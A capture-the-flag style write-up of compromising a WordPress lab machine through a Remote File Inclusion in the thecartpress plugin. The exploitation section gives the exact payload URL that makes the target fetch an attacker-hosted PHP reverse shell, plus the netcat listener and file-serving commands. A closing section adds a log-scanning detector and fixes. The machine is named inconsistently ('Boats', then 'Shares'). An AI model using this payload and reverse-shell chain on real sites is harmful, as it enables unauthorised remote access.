This is my third write-up, and I will be discussing my experience with the machine “Boats” from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing. Shares was a pretty easy Windows box. A WordPress plugin, thecartpress, was found vulnerable, leading to a Remote File Inclusion (RFI).


Step 1: Enumeration

Kicked off with an Nmap scan and jumped right in. My first scan used default scripts (-sC) and version detection (-sV). The second scan gave me pretty much the same results.

sudo nmap -sC -sV 172.31.1.14

I always read my results from top to bottom when looking into the ports. I visited the webpage and ran some web enumeration scans but found nothing interesting. Going back to my Nmap results, the WordPress version 4.0.1 caught my attention. I ran WPScan, a great tool baked into Kali that scans for WordPress vulnerabilities.

sudo wpscan --url http://172.31.1.14/

Looking at my scan results I noticed that the thecartpress plugin was outdated.

Step 2: Exploitation

I then googled the plugin name thecartpress along with the word exploit and bam!

Looking at the exploit, I appended this path to the URL http://172.31.1.14/

/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI

I noticed the error revealing the Remote File Inclusion (RFI).

My focus was on the tcp_class_path parameter in the URL, because this is where I would point to the file I wanted the target to fetch from my machine and run.

Well, I knew this machine runs PHP on Windows, so I googled for a Windows PHP reverse shell and found this bad boy on GitHub.

I cloned the shell onto my machine, opened the file in Vim and changed the IP to the one assigned to my tun0 adapter.

You can also change the port if you want.

Next, I needed netcat listening to receive the incoming connection from the shell, and Python's SimpleHTTPServer to serve up the shell file. Make sure the shell file is in the same directory you start the Python server from.

First terminal window:

nc -lvp 1234

Second Terminal Window:

sudo python -m SimpleHTTPServer 80


I then took the URL path we gathered from the exploit and appended http://10.10.0.6/sinnershell.php as the tcp_class_path value, which made the target fetch the file from my Python server.

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.6/sinnershell.php

Back on my Kali box, netcat showed the reverse connection, giving me access to the victim machine as Admin.
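From the defender's side, the two requests above leave a clear trace in the web server's access log: a query parameter whose value is a full URL pointing at another host. The following Python script is an added example (not part of this write-up or of WPScan) that scans Apache combined-format log lines for that pattern and rates each hit, treating a parameter whose name hints at a path or include (such as tcp_class_path) or a value ending in a script extension as high severity. The log lines, client addresses and timestamps are constructed for the example; they are not from the lab.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format log lines for this example (addresses and
# timestamps are made up). Line 2 mirrors the RFI request shape from the
# write-up; line 4 is a benign search query that happens to contain a URL.
SAMPLE_LOG = """\
10.10.0.6 - - [12/May/2020:10:01:02 +0000] "GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI HTTP/1.1" 500 512 "-" "Mozilla/5.0"
10.10.0.6 - - [12/May/2020:10:02:15 +0000] "GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http%3A%2F%2F10.10.0.6%2Fsinnershell.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.20 - - [12/May/2020:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.21 - - [12/May/2020:10:04:00 +0000] "GET /?s=http://example.com HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Schemes/wrappers that make include() reach outside the local filesystem.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "data:", "php://", "expect://")
# Parameter names that commonly feed include/require in PHP applications.
PATH_PARAM_HINT = re.compile(r"(path|file|include|page|template|class|dir|doc|load|src)", re.I)
# Values that end in something PHP would happily execute or include.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|txt|inc)(\?|$)", re.I)


def find_remote_includes(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parsed = urlparse(m.group("target"))
    findings = []
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for value in values:
            # parse_qs decodes once; decode again to catch double-encoded payloads.
            decoded = unquote(value).strip().lower()
            if not decoded.startswith(REMOTE_SCHEMES):
                continue
            suspicious_name = PATH_PARAM_HINT.search(name) is not None
            script_value = SCRIPT_EXT.search(decoded) is not None
            findings.append({
                "client": m.group("ip"),
                "time": m.group("ts"),
                "script": parsed.path,
                "param": name,
                "value": decoded,
                "status": int(m.group("status")),
                "severity": "high" if (suspicious_name or script_value) else "low",
            })
    return findings


def scan_log(text):
    """Scan a whole log (one request per line) and collect all findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(find_remote_includes(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['client']} {f['time']} {f['script']} "
              f"{f['param']}={f['value']} (HTTP {f['status']})")
```

On the sample data the script flags the request with tcp_class_path set to a remote .php file as high and the search query as low, so the benign line is visible but does not page anyone. A 200 status on a high-severity hit is the more urgent case, since it suggests the include succeeded; pairing the alert with the fix, which for PHP means keeping allow_url_include off and replacing user-controlled include paths with a fixed allowlist, closes the loop.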

Web App Pen Tester 🦇 | https://github.com/SoftwareSinner